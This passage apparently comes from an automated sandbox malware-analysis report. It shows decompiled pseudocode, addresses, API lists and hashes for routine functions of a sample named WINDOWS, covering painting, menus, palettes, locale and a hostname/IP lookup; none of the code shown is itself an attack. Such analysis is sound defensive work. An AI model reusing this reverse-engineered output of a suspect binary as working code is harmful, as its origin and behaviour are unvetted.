							goto L12;
							L11:
							_t98 = _t98 + 1;
							_t96 = _t96 - 1;
						} while (_t96 != 0);
					}
					L12:
					if(_v16 != 1) {
						 *((intOrPtr*)( *_v8 + 0xb8))();
					}
					RestoreDC(_t75, _v20);
				} else {
					 *((intOrPtr*)( *_v8 + 0xb8))();
				}
				E0043F510(_v8, 0, _t75);
				_pop(_t84);
				 *[fs:eax] = _t84;
				_push(0x43f4df);
				_t55 = _v12;
				if( *((intOrPtr*)(_t55 + 4)) == 0) {
					return EndPaint(E00441704(_v8),  &_v84);
				}
				return _t55;
			}


















                                                    0x0043f3b9
                                                    0x0043f3bb
                                                    0x0043f3c1
                                                    0x0043f3c4
                                                    0x0043f3ca
                                                    0x0043f3cf
                                                    0x0043f3e3
                                                    0x0043f3e3
                                                    0x0043f3e7
                                                    0x0043f3e8
                                                    0x0043f3ed
                                                    0x0043f3f0
                                                    0x0043f3fd
                                                    0x0043f417
                                                    0x0043f41a
                                                    0x0043f42d
                                                    0x0043f430
                                                    0x0043f432
                                                    0x0043f433
                                                    0x0043f435
                                                    0x0043f440
                                                    0x0043f449
                                                    0x0043f45b
                                                    0x00000000
                                                    0x0043f45d
                                                    0x0043f479
                                                    0x0043f480
                                                    0x00000000
                                                    0x00000000
                                                    0x0043f480
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x0043f482
                                                    0x0043f482
                                                    0x0043f483
                                                    0x0043f483
                                                    0x0043f435
                                                    0x0043f486
                                                    0x0043f48a
                                                    0x0043f493
                                                    0x0043f493
                                                    0x0043f49e
                                                    0x0043f3ff
                                                    0x0043f406
                                                    0x0043f406
                                                    0x0043f4aa
                                                    0x0043f4b1
                                                    0x0043f4b4
                                                    0x0043f4b7
                                                    0x0043f4bc
                                                    0x0043f4c3
                                                    0x00000000
                                                    0x0043f4d2
                                                    0x0043f4d7

                                                    APIs
                                                    • BeginPaint.USER32(00000000,?), ref: 0043F3DE
                                                    • SaveDC.GDI32(?), ref: 0043F412
                                                    • ExcludeClipRect.GDI32(?,?,?,?,?,?), ref: 0043F474
                                                    • RestoreDC.GDI32(?,?), ref: 0043F49E
                                                    • EndPaint.USER32(00000000,?,0043F4DF), ref: 0043F4D2
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.337852872.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000009.00000002.337842077.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000009.00000002.337959100.000000000049B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000009.00000002.337978553.00000000004A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_400000_WINDOWS.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Paint$BeginClipExcludeRectRestoreSave
                                                    • String ID:
                                                    • API String ID: 3808407030-0
                                                    • Opcode ID: d4ea672e3d9b3f4c2e1dab9854368b7484ecc5b1cbb8fc2f2094f499677641b8
                                                    • Instruction ID: 9443a4bcddcea103c83dcf0c2b69b8a33cb36b1669e9c3c4d5886d405921b8f2
                                                    • Opcode Fuzzy Hash: d4ea672e3d9b3f4c2e1dab9854368b7484ecc5b1cbb8fc2f2094f499677641b8
                                                    • Instruction Fuzzy Hash: DA415070E00208AFC700DB99C984EAFB7F9AF58318F5490BAE90497362D739AE45CB54
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0044AD40 Relevance: 7.6, APIs: 5, Instructions: 77COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 100%
                                                    			E0044AD40(int __eax, void* __edx) {
				signed int _t39;
				signed int _t40;
				intOrPtr _t44;
				int _t46;
				int _t47;
				intOrPtr* _t48;

				_t18 = __eax;
				_t48 = __eax;
				if(( *(__eax + 0x1c) & 0x00000008) == 0) {
					if(( *(__eax + 0x1c) & 0x00000002) != 0) {
						 *((char*)(__eax + 0x74)) = 1;
						return __eax;
					}
					_t19 =  *((intOrPtr*)(__eax + 0x6c));
					if( *((intOrPtr*)(__eax + 0x6c)) != 0) {
						return E0044AD40(_t19, __edx);
					}
					_t18 = GetMenuItemCount(E0044AE70(__eax));
					_t47 = _t18;
					_t40 = _t39 & 0xffffff00 | _t47 == 0x00000000;
					while(_t47 > 0) {
						_t46 = _t47 - 1;
						_t18 = GetMenuState(E0044AE70(_t48), _t46, 0x400);
						if((_t18 & 0x00000004) == 0) {
							_t18 = RemoveMenu(E0044AE70(_t48), _t46, 0x400);
							_t40 = 1;
						}
						_t47 = _t47 - 1;
					}
					if(_t40 != 0) {
						if( *((intOrPtr*)(_t48 + 0x64)) != 0) {
							L14:
							E0044AC00(_t48);
							L15:
							return  *((intOrPtr*)( *_t48 + 0x3c))();
						}
						_t44 =  *0x449854; // 0x4498a0
						if(E00403D78( *((intOrPtr*)(_t48 + 0x70)), _t44) == 0 || GetMenuItemCount(E0044AE70(_t48)) != 0) {
							goto L14;
						} else {
							DestroyMenu( *(_t48 + 0x34));
							 *(_t48 + 0x34) = 0;
							goto L15;
						}
					}
				}
				return _t18;
			}









                                                    0x0044ad40
                                                    0x0044ad44
                                                    0x0044ad4a
                                                    0x0044ad54
                                                    0x0044ad56
                                                    0x00000000
                                                    0x0044ad56
                                                    0x0044ad5f
                                                    0x0044ad64
                                                    0x00000000
                                                    0x0044ad66
                                                    0x0044ad78
                                                    0x0044ad7d
                                                    0x0044ad81
                                                    0x0044ad86
                                                    0x0044ad8f
                                                    0x0044ad99
                                                    0x0044ada0
                                                    0x0044adb0
                                                    0x0044adb5
                                                    0x0044adb5
                                                    0x0044adb7
                                                    0x0044adb8
                                                    0x0044adbe
                                                    0x0044adc4
                                                    0x0044adf9
                                                    0x0044adfb
                                                    0x0044ae00
                                                    0x00000000
                                                    0x0044ae06
                                                    0x0044adc9
                                                    0x0044add6
                                                    0x00000000
                                                    0x0044ade9
                                                    0x0044aded
                                                    0x0044adf4
                                                    0x00000000
                                                    0x0044adf4
                                                    0x0044add6
                                                    0x0044adbe
                                                    0x0044ae0d

                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.337852872.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000009.00000002.337842077.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000009.00000002.337959100.000000000049B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000009.00000002.337978553.00000000004A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_400000_WINDOWS.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 5343eef08e8d1dd02cbbfae1b5f1536b7b7bec594a8a1cd2160f538fd193b115
                                                    • Instruction ID: ccdcb766eb864ac881303502937fc5a84d080c6be124c079d60bb56e6bda1b55
                                                    • Opcode Fuzzy Hash: 5343eef08e8d1dd02cbbfae1b5f1536b7b7bec594a8a1cd2160f538fd193b115
                                                    • Instruction Fuzzy Hash: 7111D270EC521857FB60BEBA8806B5B378A5F41749F14042FBD119B782DA3CDC65829F
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0045A390 Relevance: 7.6, APIs: 5, Instructions: 73windowCOMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 100%
                                                    			E0045A390(void* __eax, void* __ecx, struct HWND__** __edx) {
				intOrPtr _t11;
				intOrPtr _t20;
				void* _t30;
				void* _t31;
				void* _t33;
				struct HWND__** _t34;
				struct HWND__* _t35;
				struct HWND__* _t36;

				_t31 = __ecx;
				_t34 = __edx;
				_t33 = __eax;
				_t30 = 0;
				_t11 =  *((intOrPtr*)(__edx + 4));
				if(_t11 < 0x100 || _t11 > 0x108) {
					L16:
					return _t30;
				} else {
					_t35 = GetCapture();
					if(_t35 != 0) {
						if(GetWindowLongA(_t35, 0xfffffffa) ==  *0x49e668 && SendMessageA(_t35, _t34[1] + 0xbc00, _t34[2], _t34[3]) != 0) {
							_t30 = 1;
						}
						goto L16;
					}
					_t36 =  *_t34;
					_t2 = _t33 + 0x44; // 0x0
					_t20 =  *_t2;
					if(_t20 == 0 || _t36 !=  *((intOrPtr*)(_t20 + 0x254))) {
						L7:
						if(E00437E5C(_t36, _t31) == 0 && _t36 != 0) {
							_t36 = GetParent(_t36);
							goto L7;
						}
						if(_t36 == 0) {
							_t36 =  *_t34;
						}
						goto L11;
					} else {
						_t36 = E00441704(_t20);
						L11:
						if(SendMessageA(_t36, _t34[1] + 0xbc00, _t34[2], _t34[3]) != 0) {
							_t30 = 1;
						}
						goto L16;
					}
				}
			}











                                                    0x0045a390
                                                    0x0045a394
                                                    0x0045a396
                                                    0x0045a398
                                                    0x0045a39a
                                                    0x0045a3a2
                                                    0x0045a441
                                                    0x0045a447
                                                    0x0045a3b3
                                                    0x0045a3b8
                                                    0x0045a3bc
                                                    0x0045a422
                                                    0x0045a43f
                                                    0x0045a43f
                                                    0x00000000
                                                    0x0045a422
                                                    0x0045a3be
                                                    0x0045a3c0
                                                    0x0045a3c0
                                                    0x0045a3c5
                                                    0x0045a3e0
                                                    0x0045a3e9
                                                    0x0045a3de
                                                    0x00000000
                                                    0x0045a3de
                                                    0x0045a3f1
                                                    0x0045a3f3
                                                    0x0045a3f3
                                                    0x00000000
                                                    0x0045a3cf
                                                    0x0045a3d4
                                                    0x0045a3f5
                                                    0x0045a40e
                                                    0x0045a410
                                                    0x0045a410
                                                    0x00000000
                                                    0x0045a40e
                                                    0x0045a3c5

                                                    APIs
                                                    • GetCapture.USER32 ref: 0045A3B3
                                                    • SendMessageA.USER32(00000000,-0000BBEE,0049ABD1,?), ref: 0045A407
                                                    • GetWindowLongA.USER32 ref: 0045A417
                                                    • SendMessageA.USER32(00000000,-0000BBEE,0049ABD1,?), ref: 0045A436
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.337852872.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000009.00000002.337842077.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000009.00000002.337959100.000000000049B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000009.00000002.337978553.00000000004A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_400000_WINDOWS.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: MessageSend$CaptureLongWindow
                                                    • String ID:
                                                    • API String ID: 1158686931-0
                                                    • Opcode ID: 5b89e33d5f33cfaebd5b1cc37b20e9e534ad05d39b8e2e3f38a1a5aac5179a0b
                                                    • Instruction ID: 3b7db6bc04ec6c9b9a315d118ec06550147a56b28b89c41b1f9545d3d98f8dbc
                                                    • Opcode Fuzzy Hash: 5b89e33d5f33cfaebd5b1cc37b20e9e534ad05d39b8e2e3f38a1a5aac5179a0b
                                                    • Instruction Fuzzy Hash: 491193712042095F9620FA9DC884F1373CC9B15319B10453AFD59C3343EAACFC54826B
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00442F0C Relevance: 7.6, APIs: 5, Instructions: 73COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 22%
                                                    			E00442F0C(void* __eax) {
				intOrPtr _v8;
				intOrPtr _v12;
				char _v16;
				intOrPtr* _t14;
				intOrPtr* _t17;
				intOrPtr _t19;
				intOrPtr* _t21;
				intOrPtr* _t26;
				intOrPtr _t37;
				void* _t39;
				intOrPtr _t47;
				void* _t49;
				void* _t51;
				intOrPtr _t52;

				_t49 = _t51;
				_t52 = _t51 + 0xfffffff4;
				_t39 = __eax;
				if( *((short*)(__eax + 0x68)) == 0xffff) {
					return __eax;
				} else {
					_t14 =  *0x49d970; // 0x49e900
					_t17 =  *0x49d970; // 0x49e900
					_t19 =  *((intOrPtr*)( *_t17))(0xd,  *((intOrPtr*)( *_t14))(0xe, 1, 1, 1));
					_push(_t19);
					L0042C408();
					_v8 = _t19;
					_push(_t49);
					_push(0x442fcc);
					_push( *[fs:eax]);
					 *[fs:eax] = _t52;
					_t21 =  *0x49de0c; // 0x49ebbc
					E0042C440(_v8, E004586EC( *_t21,  *((short*)(__eax + 0x68))));
					_t26 =  *0x49de0c; // 0x49ebbc
					E0042C440(_v8, E004586EC( *_t26,  *((short*)(_t39 + 0x68))));
					_push(0);
					_push(0);
					_push(0);
					_push(_v8);
					L0042C48C();
					_push( &_v16);
					_push(0);
					L0042C49C();
					_push(_v12);
					_push(_v16);
					_push(1);
					_push(_v8);
					L0042C48C();
					_pop(_t47);
					 *[fs:eax] = _t47;
					_push(0x442fd3);
					_t37 = _v8;
					_push(_t37);
					L0042C410();
					return _t37;
				}
			}

















                                                    0x00442f0d
                                                    0x00442f0f
                                                    0x00442f13
                                                    0x00442f1a
                                                    0x00442fd7
                                                    0x00442f20
                                                    0x00442f28
                                                    0x00442f34
                                                    0x00442f3b
                                                    0x00442f3d
                                                    0x00442f3e
                                                    0x00442f43
                                                    0x00442f48
                                                    0x00442f49
                                                    0x00442f4e
                                                    0x00442f51
                                                    0x00442f58
                                                    0x00442f69
                                                    0x00442f72
                                                    0x00442f83
                                                    0x00442f88
                                                    0x00442f8a
                                                    0x00442f8c
                                                    0x00442f91
                                                    0x00442f92
                                                    0x00442f9a
                                                    0x00442f9b
                                                    0x00442f9d
                                                    0x00442fa5
                                                    0x00442fa9
                                                    0x00442faa
                                                    0x00442faf
                                                    0x00442fb0
                                                    0x00442fb7
                                                    0x00442fba
                                                    0x00442fbd
                                                    0x00442fc2
                                                    0x00442fc5
                                                    0x00442fc6
                                                    0x00442fcb
                                                    0x00442fcb

                                                    APIs
                                                    • 739F1AB0.COMCTL32(00000000), ref: 00442F3E
                                                      • Part of subcall function 0042C440: 739F2140.COMCTL32(00439016,000000FF,00000000,00442F6E,00000000,00442FCC,?,00000000), ref: 0042C444
                                                    • 739F1680.COMCTL32(00439016,00000000,00000000,00000000,00000000,00442FCC,?,00000000), ref: 00442F92
                                                    • 739F1710.COMCTL32(00000000,?,00439016,00000000,00000000,00000000,00000000,00442FCC,?,00000000), ref: 00442F9D
                                                    • 739F1680.COMCTL32(00439016,00000001,?,00443035,00000000,?,00439016,00000000,00000000,00000000,00000000,00442FCC,?,00000000), ref: 00442FB0
                                                    • 739F1F60.COMCTL32(00439016,00442FD3,00443035,00000000,?,00439016,00000000,00000000,00000000,00000000,00442FCC,?,00000000), ref: 00442FC6
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.337852872.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000009.00000002.337842077.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000009.00000002.337959100.000000000049B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000009.00000002.337978553.00000000004A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_400000_WINDOWS.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: F1680$F1710F2140
                                                    • String ID:
                                                    • API String ID: 3528053765-0
                                                    • Opcode ID: dd8f6c6bef30573f89024d1b65c38e83719737ac9faca5af5380f6cb668c253e
                                                    • Instruction ID: 31acb13db4a7b61839ae31ff436912f2200b31873635aba84f9d8170318329f8
                                                    • Opcode Fuzzy Hash: dd8f6c6bef30573f89024d1b65c38e83719737ac9faca5af5380f6cb668c253e
                                                    • Instruction Fuzzy Hash: 8B216F74B04204AFEB10EBA9DCD2F6E73F8EB48704F900066F904DB291DAB9AD40C758
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00472C58 Relevance: 7.6, APIs: 5, Instructions: 67networkCOMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 86%
                                                    			E00472C58(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr* _v8;
				char _v408;
				char _v412;
				char _v416;
				int _t30;
				char* _t38;
				signed int _t39;
				intOrPtr _t48;
				intOrPtr* _t53;
				intOrPtr _t55;
				void* _t56;
				void* _t58;

				_v416 = 0;
				_v412 = 0;
				 *[fs:eax] = _t58 + 0xfffffe64;
				_t38 = E00408D24(0x104, __eflags);
				L00472BD0();
				_v8 = E00403BBC(1);
				 *((intOrPtr*)( *_v8 + 0x44))(0x101,  &_v408,  *[fs:eax], 0x472d31, _t58, __edi, __esi, __ebx, _t56);
				E00404BB8( &_v412, _t38);
				_t30 = gethostname(_t38, E00404C80(_v412));
				_push(_t38);
				L00472BC0();
				if(_t30 != 0) {
					_t55 =  *((intOrPtr*)(_t30 + 0xc));
					_t39 = 0;
					while(1) {
						_t53 =  *((intOrPtr*)(_t55 + _t39 * 4));
						if(_t53 == 0) {
							break;
						}
						L00472BB8();
						E00404BB8( &_v416, _t30);
						_t30 =  *((intOrPtr*)( *_v8 + 0x38))( *_t53);
						_t39 = _t39 + 1;
						__eflags = _t39;
					}
					L00472BD8();
				}
				_pop(_t48);
				 *[fs:eax] = _t48;
				_push(0x472d38);
				return E004049E4( &_v416, 2);
			}















                                                    0x00472c66
                                                    0x00472c6c
                                                    0x00472c7d
                                                    0x00472c8a
                                                    0x00472c98
                                                    0x00472ca9
                                                    0x00472cb1
                                                    0x00472cbc
                                                    0x00472cce
                                                    0x00472cd3
                                                    0x00472cd4
                                                    0x00472cdb
                                                    0x00472cdd
                                                    0x00472ce0
                                                    0x00472d07
                                                    0x00472d07
                                                    0x00472d0c
                                                    0x00000000
                                                    0x00000000
                                                    0x00472ce6
                                                    0x00472cf3
                                                    0x00472d03
                                                    0x00472d06
                                                    0x00472d06
                                                    0x00472d06
                                                    0x00472d0e
                                                    0x00472d0e
                                                    0x00472d15
                                                    0x00472d18
                                                    0x00472d1b
                                                    0x00472d30

                                                    APIs
                                                    • WSAStartup.WSOCK32(00000101,?,00000000,00472D31), ref: 00472C98
                                                    • gethostname.WSOCK32(00000000,00000000), ref: 00472CCE
                                                    • gethostbyname.WSOCK32(00000000,00000000,00000000), ref: 00472CD4
                                                    • inet_ntoa.WSOCK32(?,00000000,00000000,00000000), ref: 00472CE6
                                                    • WSACleanup.WSOCK32(?,00000000,00000000,00000000), ref: 00472D0E
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.337852872.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000009.00000002.337842077.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000009.00000002.337959100.000000000049B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000009.00000002.337978553.00000000004A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_400000_WINDOWS.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CleanupStartupgethostbynamegethostnameinet_ntoa
                                                    • String ID:
                                                    • API String ID: 348263315-0
                                                    • Opcode ID: f06fb68704c44451b8735ee50c57d78fe34c005703e9fb394dc065d854421570
                                                    • Instruction ID: f3059b0da6ec3e1b640db76434b3b8e2fe7969af481d0775728bf7a32dd752b6
                                                    • Opcode Fuzzy Hash: f06fb68704c44451b8735ee50c57d78fe34c005703e9fb394dc065d854421570
                                                    • Instruction Fuzzy Hash: A521C3706001049FD760EF31CD91ADAB7F8EF45304F5184FAA94CA7352DAB8AE418B98
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0042A288 Relevance: 7.6, APIs: 5, Instructions: 66windowCOMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 78%
                                                    			E0042A288(struct HPALETTE__* __eax) {
				struct HPALETTE__* _t21;
				char _t28;
				signed int _t30;
				struct HPALETTE__* _t36;
				struct HPALETTE__* _t37;
				struct HDC__* _t38;
				intOrPtr _t39;

				_t21 = __eax;
				_t36 = __eax;
				_t39 =  *((intOrPtr*)(__eax + 0x28));
				if( *((char*)(__eax + 0x30)) == 0 &&  *(_t39 + 0x10) == 0 &&  *((intOrPtr*)(_t39 + 0x14)) != 0) {
					_t22 =  *((intOrPtr*)(_t39 + 0x14));
					if( *((intOrPtr*)(_t39 + 0x14)) ==  *((intOrPtr*)(_t39 + 8))) {
						E00428BFC(_t22);
					}
					_t21 = E00426750( *((intOrPtr*)(_t39 + 0x14)), 1 <<  *(_t39 + 0x3e));
					_t37 = _t21;
					 *(_t39 + 0x10) = _t37;
					if(_t37 == 0) {
						_push(0);
						L00407638();
						_t21 = E00426060(_t21);
						_t38 = _t21;
						if( *((char*)(_t39 + 0x71)) != 0) {
							L9:
							_t28 = 1;
						} else {
							_push(0xc);
							_push(_t38);
							L00407380();
							_push(0xe);
							_push(_t38);
							L00407380();
							_t30 = _t21 * _t21;
							_t21 = ( *(_t39 + 0x2a) & 0x0000ffff) * ( *(_t39 + 0x28) & 0x0000ffff);
							if(_t30 < _t21) {
								goto L9;
							} else {
								_t28 = 0;
							}
						}
						 *((char*)(_t39 + 0x71)) = _t28;
						if(_t28 != 0) {
							_t21 = CreateHalftonePalette(_t38);
							 *(_t39 + 0x10) = _t21;
						}
						_push(_t38);
						_push(0);
						L00407888();
						if( *(_t39 + 0x10) == 0) {
							 *((char*)(_t36 + 0x30)) = 1;
							return _t21;
						}
					}
				}
				return _t21;
			}










                                                    0x0042a288
                                                    0x0042a28c
                                                    0x0042a28e
                                                    0x0042a295
                                                    0x0042a2af
                                                    0x0042a2b5
                                                    0x0042a2b7
                                                    0x0042a2b7
                                                    0x0042a2ce
                                                    0x0042a2d3
                                                    0x0042a2d5
                                                    0x0042a2da
                                                    0x0042a2dc
                                                    0x0042a2de
                                                    0x0042a2e3
                                                    0x0042a2e8
                                                    0x0042a2ee
                                                    0x0042a317
                                                    0x0042a317
                                                    0x0042a2f0
                                                    0x0042a2f0
                                                    0x0042a2f2
                                                    0x0042a2f3
                                                    0x0042a2fa
                                                    0x0042a2fc
                                                    0x0042a2fd
                                                    0x0042a302
                                                    0x0042a30d
                                                    0x0042a311
                                                    0x00000000
                                                    0x0042a313
                                                    0x0042a313
                                                    0x0042a313
                                                    0x0042a311
                                                    0x0042a319
                                                    0x0042a31e
                                                    0x0042a321
                                                    0x0042a326
                                                    0x0042a326
                                                    0x0042a329
                                                    0x0042a32a
                                                    0x0042a32c
                                                    0x0042a335
                                                    0x0042a337
                                                    0x00000000
                                                    0x0042a337
                                                    0x0042a335
                                                    0x0042a2da
                                                    0x0042a33f

                                                    APIs
                                                    • 733AAC50.USER32(00000000,?,?,?,?,00428DD3,00000000,00428E5F), ref: 0042A2DE
                                                    • 733AAD70.GDI32(00000000,0000000C,00000000,?,?,?,?,00428DD3,00000000,00428E5F), ref: 0042A2F3
                                                    • 733AAD70.GDI32(00000000,0000000E,00000000,0000000C,00000000,?,?,?,?,00428DD3,00000000,00428E5F), ref: 0042A2FD
                                                    • CreateHalftonePalette.GDI32(00000000,00000000,?,?,?,?,00428DD3,00000000,00428E5F), ref: 0042A321
                                                    • 733AB380.USER32(00000000,00000000,00000000,?,?,?,?,00428DD3,00000000,00428E5F), ref: 0042A32C
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.337852872.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000009.00000002.337842077.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000009.00000002.337959100.000000000049B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000009.00000002.337978553.00000000004A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_400000_WINDOWS.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: B380CreateHalftonePalette
                                                    • String ID:
                                                    • API String ID: 178651289-0
                                                    • Opcode ID: e67643a24833364483348e8498fc212bf2f1e615a4c10726663e597d674b9aa6
                                                    • Instruction ID: a69a9921d942d4c2fc4b887ba219ee821ce262c4093934c48757552ca675d17f
                                                    • Opcode Fuzzy Hash: e67643a24833364483348e8498fc212bf2f1e615a4c10726663e597d674b9aa6
                                                    • Instruction Fuzzy Hash: E211B4217092699BEB20EF25A4457EF3690AB10359F84012AFD0097281D7BC9CA5C3EA
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 004266B8 Relevance: 7.6, APIs: 5, Instructions: 55COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 40%
                                                    			E004266B8(intOrPtr __eax) {
				char _v5;
				intOrPtr _v12;
				intOrPtr _t14;
				intOrPtr _t16;
				intOrPtr _t18;
				intOrPtr _t21;
				intOrPtr _t30;
				void* _t32;
				void* _t34;
				intOrPtr _t35;

				_t32 = _t34;
				_t35 = _t34 + 0xfffffff8;
				_v5 = 0;
				if( *0x49e894 == 0) {
					return _v5;
				} else {
					_push(0);
					L00407638();
					_v12 = __eax;
					_push(_t32);
					_push(0x42673e);
					_push( *[fs:edx]);
					 *[fs:edx] = _t35;
					_push(0x68);
					_t14 = _v12;
					_push(_t14);
					L00407380();
					if(_t14 >= 0x10) {
						_push(__eax + 4);
						_push(8);
						_push(0);
						_t18 =  *0x49e894; // 0x770805ad
						_push(_t18);
						L004073A8();
						_push(__eax + ( *(__eax + 2) & 0x0000ffff) * 4 - 0x1c);
						_push(8);
						_push(8);
						_t21 =  *0x49e894; // 0x770805ad
						_push(_t21);
						L004073A8();
						_v5 = 1;
					}
					_pop(_t30);
					 *[fs:eax] = _t30;
					_push(0x426745);
					_t16 = _v12;
					_push(_t16);
					_push(0);
					L00407888();
					return _t16;
				}
			}













                                                    0x004266b9
                                                    0x004266bb
                                                    0x004266c1
                                                    0x004266cc
                                                    0x0042674c
                                                    0x004266ce
                                                    0x004266ce
                                                    0x004266d0
                                                    0x004266d5
                                                    0x004266da
                                                    0x004266db
                                                    0x004266e0
                                                    0x004266e3
                                                    0x004266e6
                                                    0x004266e8
                                                    0x004266eb
                                                    0x004266ec
                                                    0x004266f4
                                                    0x004266f9
                                                    0x004266fa
                                                    0x004266fc
                                                    0x004266fe
                                                    0x00426703
                                                    0x00426704
                                                    0x00426711
                                                    0x00426712
                                                    0x00426714
                                                    0x00426716
                                                    0x0042671b
                                                    0x0042671c
                                                    0x00426721
                                                    0x00426721
                                                    0x00426727
                                                    0x0042672a
                                                    0x0042672d
                                                    0x00426732
                                                    0x00426735
                                                    0x00426736
                                                    0x00426738
                                                    0x0042673d
                                                    0x0042673d

                                                    APIs
                                                    • 733AAC50.USER32(00000000), ref: 004266D0
                                                    • 733AAD70.GDI32(?,00000068,00000000,0042673E,?,00000000), ref: 004266EC
                                                    • 733AAEA0.GDI32(770805AD,00000000,00000008,?,?,00000068,00000000,0042673E,?,00000000), ref: 00426704
                                                    • 733AAEA0.GDI32(770805AD,00000008,00000008,?,770805AD,00000000,00000008,?,?,00000068,00000000,0042673E,?,00000000), ref: 0042671C
                                                    • 733AB380.USER32(00000000,?,00426745,0042673E,?,00000000), ref: 00426738
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.337852872.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000009.00000002.337842077.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000009.00000002.337959100.000000000049B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000009.00000002.337978553.00000000004A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_400000_WINDOWS.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: B380
                                                    • String ID:
                                                    • API String ID: 120756276-0
                                                    • Opcode ID: b008b661d38c4f5ea8a9daaf1a5d07ce1dbb277d7a802cc1eb5a05b65464a69b
                                                    • Instruction ID: c0b5c4fbf9d89d63b7e1562d2f304591e56de7434d42fe68f424cbdc017dfa0b
                                                    • Opcode Fuzzy Hash: b008b661d38c4f5ea8a9daaf1a5d07ce1dbb277d7a802cc1eb5a05b65464a69b
                                                    • Instruction Fuzzy Hash: 1B11A531A483047EFB41DBE5AC86F6D7BA8E745718F94806BFA04AA1C1D97A6404C729
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0040CBEC Relevance: 7.6, APIs: 5, Instructions: 50threadCOMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 64%
                                                    			E0040CBEC(void* __esi, void* __eflags) {
				char _v8;
				intOrPtr* _t18;
				intOrPtr _t26;
				void* _t27;
				long _t29;
				intOrPtr _t32;
				void* _t33;

				_t33 = __eflags;
				_push(0);
				_push(_t32);
				_push(0x40cc83);
				_push( *[fs:eax]);
				 *[fs:eax] = _t32;
				E0040C964(GetThreadLocale(), 0x40cc98, 0x100b,  &_v8);
				_t29 = E00409664(0x40cc98, 1, _t33);
				if(_t29 + 0xfffffffd - 3 < 0) {
					EnumCalendarInfoA(E0040CB38, GetThreadLocale(), _t29, 4);
					_t27 = 7;
					_t18 = 0x49e770;
					do {
						 *_t18 = 0xffffffff;
						_t18 = _t18 + 4;
						_t27 = _t27 - 1;
					} while (_t27 != 0);
					EnumCalendarInfoA(E0040CB74, GetThreadLocale(), _t29, 3);
				}
				_pop(_t26);
